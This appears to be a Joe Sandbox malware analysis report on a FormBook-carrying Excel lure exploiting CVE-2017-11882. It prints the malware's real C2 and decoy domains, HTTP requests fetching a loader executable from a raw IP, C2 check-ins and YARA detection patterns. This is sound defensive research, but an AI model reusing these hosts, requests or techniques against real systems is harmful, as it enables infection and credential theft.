Loading ...

Play interactive tourEdit tour

Analysis Report Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Overview

General Information

Sample Name:Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
Analysis ID:433035
MD5:27211c2dc1809cc2ab4469ff246f9cb4
SHA1:735918b9ed26c5eafa266305fcf677bd2ee5f0a2
SHA256:b4b855d04e706c33129c2db1c80d8b05497fa56a2288ef2fb4e631fe42aa781f
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2988 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3068 cmdline: 'C:\Users\Public\vbc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
      • vbc.exe (PID: 2476 cmdline: 'C:\Users\Public\vbc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2204 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 1664 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.9760000.7.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.9760000.7.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2988, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2988, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeReversingLabs: Detection: 28%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 28%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxVirustotal: Detection: 25%Perma Link
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.9760000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.raserver.exe.2477960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.raserver.exe.739160.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.reufhroir.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:03:41 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:14:59 GMTETag: "36f99-5c46adac1699a"Accept-Ranges: bytesContent-Length: 225177Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E25AB663.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: www.reufhroir.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
